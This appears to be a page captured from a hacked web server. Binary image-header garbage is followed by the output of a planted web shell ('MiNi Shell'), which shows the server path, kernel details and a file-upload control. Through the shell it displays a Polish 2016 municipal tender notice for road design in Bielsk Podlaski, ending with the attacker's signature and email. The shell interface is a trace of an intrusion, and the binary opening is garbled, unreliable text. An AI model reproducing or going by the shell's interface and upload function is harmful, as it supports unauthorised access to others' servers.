JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/33274-N-2016.html

<p class="kh_header"><b>Bielsk Podlaski: Część I: Budowa nawierzchni wraz z infrastrukturą w ul. Brzozowej na długości  430 m - dokumentacja projektowa 
Część II: Budowa nawierzchni wraz z infrastrukturą w ulicy Szarych Szeregów  - dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 33274 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 73 18 100, faks 0-85 73 18 150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I: Budowa nawierzchni wraz z infrastrukturą w ul. Brzozowej na długości  430 m - dokumentacja projektowa 
Część II: Budowa nawierzchni wraz z infrastrukturą w ulicy Szarych Szeregów  - dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na:
1)	Część I: Budowa nawierzchni wraz z infrastrukturą w ul. Brzozowej na długości  430 m, w następującym zakresie:
1)	budowa nawierzchni pasów pieszo-jezdnych i pasa pieszego, zieleńce,
2)	przebudowa sieci wodociągowej z przyłączami do granicy pasa drogowego,
3)	budowa brakujących odcinków kanalizacji sanitarnej bocznej do granicy pasa drogowego,
4)	przebudowa kanalizacji deszczowej,
5)	budowa linii oświetleniowej, w zakresie zaprojektowania kabla podwieszonego na istniejących słupach linii elektrycznej komunalnej,
6)	projekt stałej organizacji ruchu,
7)	w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej  z projektowanymi elementami pasa drogowego,
Zakres terenu objęty opracowaniem oznaczono na mapie odcinkami 1-2, 3-4 i 5-6.
2)	Część II: Budowa nawierzchni wraz z infrastrukturą w ulicy Szarych Szeregów, długości łącznie ok. 700m
w następującym zakresie:
1)	budowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
2)	budowa brakujących odcinków kanalizacji sanitarnej bocznej do granicy pasa drogowego,
3)	budowa kanalizacji deszczowej,
4)	budowa linii oświetleniowej na odcinku drogi ozn. nr geod. 3652/63,
5)	projekt stałej organizacji ruchu,
6)	w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej   z projektowanymi elementami pasa drogowego,
Zakres terenu objęty opracowaniem oznaczono na mapie odcinkami 7-8, 9-10 i 11-12.
Uwaga:
1)	Prace projektowe dla części II zamówienia należy skoordynować z trwającymi pracami przy tworzeniu dokumentacji projektowej na przebudowę ulicy Strzelniczej,
2)	Część I i część II zamówienia dotyczy terenów, które zlokalizowane są poza strefą konserwatorską miasta,
3)	Część II zamówienia dotyczy terenu, objętego Miejscowym Planem Zagospodarowania Przestrzennego miasta Bielsk Podlaski.
 2. W ramach realizacji umowy Wykonawca uzyska wszelkie wymagane, zgodnie z polskim prawem, uzgodnienia, opinie i decyzje administracyjne, niezbędne do opracowania dokumentacji projektowej, w tym między innymi:
1)	pozyska mapę zasadniczą w skali 1:500, aktualny wtórnik sporządzony przez uprawnionego geodetę,
2)	przygotuje niezbędne materiały i wniosek do uzyskania przez Inwestora decyzji  o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia (o ile będzie konieczne),
3)	przygotuje niezbędne materiały i wniosek do uzyskania przez Inwestora decyzji  o ustaleniu lokalizacji inwestycji celu publicznego - dotyczy tylko części I,
4)	opracuje operat wodnoprawny i przygotuje niezbędne dokumenty i wniosek do uzyskania przez Inwestora pozwolenia wodnoprawnego wraz z wykonaniem wszelkich niezbędnych do tego celu badań, opracowań i analiz (o ile będzie konieczne),
5)	wykona badania geotechniczne gruntu,
6)	uzyska wszelkie uzgodnienia, opinie i materiały niezbędne do uzyskania decyzji   o pozwoleniu na budowę przez Inwestora.
7)	uzyska pisemne uzgodnienia (oświadczenia z mapą sytuacyjno-wysokościową) właścicieli działek, zaprojektowanej lokalizacji odcinków kanalizacji sanitarnej bocznej w granicach pasa drogowego oraz lokalizacji zjazdów,  
8)	opracuje  inne, uznane  za  konieczne  przez  Wykonawcę  bądź  stosowne instytucje i urzędy, opracowania  i  badania,
9)	opracuje przedmiary robót,
10)	opracuje kosztorysy inwestorskie zgodnie z założeniami wyjściowymi do kosztorysowania uzgodnionymi z Inwestorem, Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389) oraz ustawą Prawo zamówień publicznych ( Dz. U. z 2015 r. poz. 2164),
11)	opracuje dokumentację techniczną budowy nawierzchni z infrastrukturą towarzyszącą,
12)	opracuje projekt stałej organizacji ruchu,
13)	udzieli wyjaśnień, dotyczących rozwiązań projektowych na etapie wyboru Wykonawcy robót budowlanych,
14)	na wniosek Inwestora dokona aktualizacji kosztorysu inwestorskiego, zgodnie   z wymogami ustawy Prawo zamówień publicznych.
3.	Wykonawca opracuje koncepcję proponowanych rozwiązań i przedłoży ją Zamawiającemu i jednostkom opiniującym do zatwierdzenia. 
4.	Opracowana dokumentacja powinna zawierać:
1)	projekty budowlane po 5 egz. + CD /JPG/ - opracowane  zgodnie  z  przepisami  ustawy  z  dnia 7 lipca  1994 roku  Prawo  budowlane  ( Dz. U.  z  2013 r.  poz. 1409  z późn. zm.)  i  spełniające  wymagania  rozporządzenia  Ministra  Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia  2012 r. w sprawie  szczegółowego  zakresu i  formy  projektu  budowlanego  (Dz. U.  z 2012 r. poz. 462  z późn. zm.) oraz  rozporządzenia  Ministra  Transportu, Budownictwa i Gospodarki Morskiej z dnia 10 maja 2013 r. w  sprawie  szczegółowego  zakresu  i  formy  dokumentacji  projektowej, specyfikacji  technicznych wykonania  i  odbioru  robót  budowlanych  oraz  programu  funkcjonalno - użytkowego (t.j. Dz. U. z 2013 r. poz. 1129),
2)	projekty wykonawcze po 2 egz. + CD /JPG/ oddzielnie dla każdej branży - opracowane  zgodnie  z  przepisami  ustawy  z  dnia 7 lipca  1994 roku  Prawo  budowlane  (Dz. U. z  2013 r.  poz. 1409 z późn. zm.), 
3)	przedmiary robót po 2 egz. + CD (w formacie Excel) oddzielnie dla każdej branży - przez  które  należy  rozumieć  opracowanie  zawierające  zestawienie przewidywanych do  wykonania  robót w  kolejności  technologicznej  ich  wykonania, wraz z ich  szczegółowym  opisem, miejscem  wykonania  lub  wskazaniem  podstaw  ustalających  szczegółowy  opis, z  wyliczeniem  i  zestawieniem  liczby  jednostek  miar  robót podstawowych  oraz  wskazaniem  podstaw  do  ustalania  cen  jednostkowych  robót  lub  jednostkowych  nakładów  rzeczowych. Przedmiary  muszą  uwzględniać  wymagania określone w § od 6 do 10 rozporządzenia  Ministra  Transportu, Budownictwa i Gospodarki Morskiej z dnia 10 maja 2013 r. w sprawie      w  sprawie  szczegółowego  zakresu  i  formy  dokumentacji  projektowej, specyfikacji  technicznych wykonania  i  odbioru  robót  budowlanych  oraz  programu  funkcjonalno - użytkowego (t.j. Dz. U. z 2013 r. poz. 1129),
4)	specyfikacje techniczne wykonania i odbioru robót (STWiOR) po 2 egz. + CD ( MS WORD) oddzielnie dla każdej branży - przez  które  należy rozumieć  opracowania,  zawierające w  szczególności  zbiory  wymagań,  które  są  niezbędne do  kreślenia  standardu  i  jakości  wykonania  robót  w  zakresie  sposobu  wykonania  robót budowlanych, właściwości  wyrobów  budowlanych  oraz  oceny  prawidłowości  wykonania  poszczególnych  robót. Specyfikacje  muszą  uwzględniać  wymagania  określone  w  rozporządzenia  Ministra  Transportu , Budownictwa i Gospodarki Morskiej z dnia 10 maja 2013 r. w sprawie  szczegółowego  zakresu i formy  dokumentacji  projektowej, specyfikacji  technicznych wykonania i odbioru  robót  budowlanych  oraz  programu  funkcjonalno - użytkowego (t.j. Dz. U. z 2013 r. poz. 1129),
5)	kosztorysy inwestorskie po 2 egz. + CD (w formacie Excel)  oddzielnie dla każdej branży opracowane  zgodnie  z  rozporządzeniem  Ministra  Infrastruktury  z  dnia  18 maja  2004 roku  w  sprawie  określenia  metod  i  podstaw  sporządzania  kosztorysu inwestorskiego, obliczania  planowanych  kosztów  prac  projektowych  oraz  planowanych kosztów  robót  budowlanych  określonych  w  programie  funkcjonalno - użytkowym  (Dz. U. z 2004 r. Nr 130, poz. 1389),
6)	kosztorysy  ofertowe po 2 egz. + CD (w formacie Excel) oddzielnie dla każdej branży,
7)	projekty stałej organizacji ruchu po 3 egz. + CD (pdf),
8)	projekty zagospodarowania zieleni (wycinki i nasadzeń drzew), po 2 egz. + CD (pdf) o ile będą konieczne, 
9)	operaty wodnoprawne + pozwolenia wodnoprawne, po 3 egz. + CD (pdf) (o ile będą konieczne),
10)	opracowania, dotyczące badań geotechnicznych gruntu po 3 egz. + CD (pdf), 
11)	informacje BIOZ po 5 egz. + CD (pdf) oddzielnie dla każdej branży.

Wszelkie wymagane opracowania przekazane zostaną Zamawiającemu także w wersji elektronicznej (pliki nie większe niż 10 Mb) dla potrzeb przeprowadzenia postępowania o udzielenie zamówienia publicznego na wybór wykonawcy robót. 
Uwaga:  Dokumentacja projektowa w zakresie opisu proponowanych materiałów i urządzeń powinna być wykonana zgodnie z art. 29 ustawy pzp. W przypadku, gdy Wykonawca sporządzając dokumentację projektową  będzie powoływał  się na pochodzenie (marka, znak towarowy, producent, dostawca)  materiałów  oraz na normy,  o których  mowa w art. 30 ust. 1-3 ustawy pzp, zobowiązany jest wskazać w dokumentacji, że dopuszcza oferowanie  materiałów lub rozwiązań równoważnych opisywanym oraz zobowiązany jest doprecyzować zakres dopuszczalnej równoważności..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu potwierdzenia spełnienia warunku wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  wykonał co najmniej 1 dokumentację projektową na budowę lub przebudowę:
1)	dróg-ulic w zakresie branży drogowej o długości co najmniej 200m - dotyczy      Części I  i Części II, 
2)	kanalizacji sanitarnej lub deszczowej o długości co najmniej 200 m - dotyczy    Części I  i Części II,
3)	linii elektrycznej napowietrznej o długości co najmniej 100 m- dotyczy         Części I  i Części II,
4)	sieci wodociągowej o długości  co najmniej 200 m - dotyczy Części I
 z podaniem przedmiotu zamówienia, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wykonawca winien wykazać, że:
a)	 dla części I zamówienia - dysponuje co najmniej 1 osobą posiadającą uprawnienia do projektowania: bez ograniczeń w specjalności sanitarnej i elektrycznej oraz co najmniej  w ograniczonym zakresie w specjalności drogowej,
 b)  dla części II zamówienia - dysponuje co najmniej 1 osobą posiadającą uprawnienia do projektowania: bez ograniczeń w specjalności sanitarnej i elektrycznej oraz co najmniej  w ograniczonym zakresie w specjalności drogowej z podaniem informacji na temat kwalifikacji zawodowych, zakresu wykonywanych czynności oraz informacji o podstawie do dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy stanowiący Załącznik Nr 1 do SIWZ ;
2.	pełnomocnictwo- w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez Wykonawców wspólnie ubiegających się  o zamówienie zgodnie  z art. 23 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Termin wykonania zamówienia - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmianę umowy w zakresie wynagrodzenia, w związku ze zmianą obowiązującej stawki podatku VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.wrotapodlasia.pl/zamowienia_i_przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bielsk Podlaski, ul. Kopernika 1, 17-100 Bielsk Podlaski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2016 godzina 10:00, miejsce: Urząd Miasta Bielsk Podlaski, ul. Kopernika 1, 17-100 Bielsk Podlaski, Biuro podawcze ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com